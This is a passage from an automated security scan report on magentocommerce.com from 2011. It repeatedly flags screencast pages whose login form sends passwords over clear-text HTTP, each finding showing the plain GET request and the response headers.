Last-Modified: Fri, 12 Aug 2011 15:07:26 GMT
Content-Length: 34645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.83. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/designers-guide-1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 37478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.84. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/gift-certificates-cards/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176002; expires=Sat, 11-Aug-2012 15:06:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:43 GMT
Content-Length: 33319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.85. http://www.magentocommerce.com/media/screencasts/grouped-products/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/grouped-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176154; expires=Sat, 11-Aug-2012 15:09:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:15 GMT
Content-Length: 33124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.86. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175988; expires=Sat, 11-Aug-2012 15:06:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:28 GMT
Content-Length: 33321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.87. http://www.magentocommerce.com/media/screencasts/landing-pages/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/landing-pages/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176057; expires=Sat, 11-Aug-2012 15:07:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:37 GMT
Content-Length: 36261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.88. http://www.magentocommerce.com/media/screencasts/permissions/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 35264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.89. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176006; expires=Sat, 11-Aug-2012 15:06:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:46 GMT
Content-Length: 33592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.90. http://www.magentocommerce.com/media/screencasts/product-comparison/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/product-comparison/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176058; expires=Sat, 11-Aug-2012 15:07:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:38 GMT
Content-Length: 33268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.91. http://www.magentocommerce.com/media/screencasts/search/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/search/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176092; expires=Sat, 11-Aug-2012 15:08:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:13 GMT
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.92. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176174; expires=Sat, 11-Aug-2012 15:09:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:34 GMT
Content-Length: 34173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.93. http://www.magentocommerce.com/media/screencasts/static-blocks/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/static-blocks/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176010; expires=Sat, 11-Aug-2012 15:06:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:51 GMT
Content-Length: 34297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.94. http://www.magentocommerce.com/media/screencasts/transactional-email/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/transactional-email/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176037; expires=Sat, 11-Aug-2012 15:07:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:18 GMT
Content-Length: 34426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.95. http://www.magentocommerce.com/media/screencasts/upsells/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/upsells/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
